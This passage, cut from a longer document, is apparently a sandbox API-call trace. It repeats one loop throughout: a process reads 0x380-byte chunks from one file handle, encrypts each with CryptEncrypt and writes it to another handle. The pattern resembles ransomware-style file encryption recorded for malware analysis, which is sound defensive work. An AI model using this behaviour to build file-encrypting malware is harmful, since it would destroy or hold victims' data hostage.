hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.398] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.399] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.400] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.401] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.402] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.402] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.403] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.403] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.403] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.403] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.404] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.404] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.404] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.404] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.404] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.405] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.405] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.406] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.406] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.406] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.406] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.406] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.406] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.407] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.407] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, 